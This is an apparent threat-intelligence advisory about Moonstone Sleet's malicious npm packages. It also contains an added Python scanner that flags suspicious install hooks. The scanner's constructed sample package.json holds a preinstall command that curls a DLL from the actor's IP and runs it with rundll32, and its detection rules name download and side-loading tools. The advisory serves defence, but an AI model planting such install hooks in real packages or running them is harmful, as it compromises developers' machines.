North Korean APT Kimsuky aka Black Banshee – Active IOCs
August 7, 2024
Hunters International Disguises SharpRhino RAT as Authentic Network Administrator Tool – Active IOCs
August 7, 2024
Severity
High
Analysis Summary
The North Korea-affiliated threat actor Moonstone Sleet continues to push malicious npm packages to the JavaScript package registry in an attempt to infect Windows systems, underscoring the persistence of its activity.
According to researchers, the two packages, harthat-api and harthat-hash, were published on July 7, 2024. Neither library received any downloads before both were taken down shortly afterwards. Researchers track the actor under the handle Stressed Pungsan, which overlaps with the recently identified North Korean activity cluster Moonstone Sleet.
Although the name resembles the Hardhat npm package, an Ethereum development tool, there is no indication that it was intended as a typosquat. The malicious package reuses code from the popular GitHub repository node-config, which has 500 forks and over 6,000 stars and is published on npm as config. Adversarial collectives are known to run attack chains that distribute forged ZIP archives through LinkedIn under fictitious company names or via freelance websites, luring targets into executing next-stage payloads that invoke an npm package under the guise of a technical skills assessment.
Once loaded, the malicious package uses curl to contact an actor-controlled IP address and retrieve further payloads such as SplitLoader. In another instance, Moonstone Sleet delivered a malicious npm loader that resulted in the theft of LSASS credentials. The later findings show that Moonstone Sleet has also been attempting to distribute its packages through the npm registry itself.
The newly discovered packages are designed to run a pre-install script declared in package.json. The script first checks whether it is running on a Windows system ("Windows_NT") and then connects to an external server to download a DLL file, which is side-loaded via the rundll32.exe binary. The rogue DLL does not perform any malicious action; it may have been uploaded to the registry prematurely, before malicious code was added, or it may have been a test run of the payload delivery mechanism.
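The delivery mechanism described above (an npm install-lifecycle script that checks for Windows, fetches a file with curl and hands it to rundll32.exe) is something a defender can hunt for before a package is ever installed. The following scanner is an added example written for this advisory, not code from the researchers or from the packages themselves. It parses a package.json, inspects every npm lifecycle hook that runs automatically during `npm install`, and scores the command against indicator patterns. The rule names, weights and the sample package.json documents are constructed for illustration; the package name and IP address in the sample are taken from this advisory, the script body itself is constructed.

```python
import json
import os
import re
from typing import Dict, List

# npm runs these hooks automatically during `npm install`, without user interaction.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "preprepare", "prepare", "postprepare")

# Indicator rules: (name, regex, weight). Weights are illustrative choices, not a standard.
RULES = [
    ("network-download", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil)\b", re.I), 3),
    ("dll-sideload",     re.compile(r"\b(rundll32|regsvr32)(\.exe)?\b", re.I), 4),
    ("os-check",         re.compile(r"Windows_NT|process\.platform|os\.type\(\)", re.I), 1),
    ("ip-literal",       re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"), 2),
    ("url",              re.compile(r"https?://", re.I), 1),
    ("inline-node",      re.compile(r"\bnode\s+-e\b"), 1),
    ("obfuscation",      re.compile(r"\b(base64|atob|eval)\b", re.I), 2),
]


def risk_level(score: int) -> str:
    """Map an indicator score to a coarse triage bucket (thresholds are illustrative)."""
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low" if score > 0 else "none"


def scan_package_json(text: str) -> List[Dict]:
    """Return one finding per lifecycle hook present in the package.json text."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [name for name, rx, _ in RULES if rx.search(cmd)]
        score = sum(w for name, _, w in RULES if name in hits)
        findings.append({
            "package": pkg.get("name", "<unnamed>"),
            "hook": hook,
            "command": cmd,
            "indicators": hits,
            "score": score,
            "risk": risk_level(score),
        })
    return findings


def scan_tree(root: str) -> List[Dict]:
    """Walk a directory (e.g. node_modules) and scan every package.json found."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        if "package.json" in filenames:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                try:
                    results.extend(scan_package_json(fh.read()))
                except (ValueError, UnicodeDecodeError):
                    continue  # unparsable manifest: skip rather than abort the sweep
    return results


# Constructed sample resembling the chain in the advisory: OS check, curl download, rundll32.
SAMPLE_SUSPICIOUS = json.dumps({
    "name": "harthat-api",
    "version": "1.0.0",
    "scripts": {
        "preinstall": "node -e \"if (require('os').type() === 'Windows_NT') { "
                      "require('child_process').execSync('curl -s http://142.111.77.196/ "
                      "-o p.dll && rundll32 p.dll') }\""
    },
})

# Constructed benign sample: a native-addon build step, common in legitimate packages.
SAMPLE_BENIGN = json.dumps({
    "name": "some-native-addon",
    "version": "2.3.1",
    "scripts": {"postinstall": "node-gyp rebuild", "test": "mocha"},
})

if __name__ == "__main__":
    for sample in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        for f in scan_package_json(sample):
            print(f"{f['package']} [{f['hook']}] risk={f['risk']} indicators={f['indicators']}")
```

Run `scan_tree("node_modules")` against a checked-out project to triage third-party manifests in bulk; the `test` script in the benign sample is deliberately ignored because only install-time hooks execute without the user asking for them. Setting `ignore-scripts=true` in `.npmrc` prevents these hooks from running at all, which is the stronger control when native builds are not required.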
The development coincides with a warning from South Korea's National Cyber Security Center (NCSC) about cyberattacks by the North Korean threat groups Andariel and Kimsuky. These groups aim to penetrate the country's construction and machinery sectors by distributing malware families such as Dora RAT and TrollAgent, also known as Troll Stealer. The Dora RAT attack sequence is notable because Andariel spread the malware by exploiting flaws in a local VPN program's software update mechanism.
Impact
- Unauthorized Access
- Identity Theft
- Credential Theft
Indicators of Compromise
IP
- 142.111.77.196
MD5
- ed862abb071c3f94b6a776238fce2514
SHA-256
- d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277
SHA-1
- cf754dd578c5d2772b3255233445b7beeccb1091
Remediation
- Block all threat indicators at your respective security controls.
- Search for the indicators of compromise (IOCs) listed above in your environment using your respective security controls.
- Regularly change passwords for all accounts and use strong, unique passwords for sensitive accounts.
- Implement multi-factor authentication (MFA) on all accounts to add an extra layer of security to login processes.
- Consider the use of phishing-resistant authenticators to further enhance security. These types of authenticators are designed to resist phishing attempts and provide additional protection against social engineering attacks.
- Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
- Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
- Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
- Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
- Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
- Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
- Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
- Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.
- Never trust or open links and attachments received from unknown sources/senders.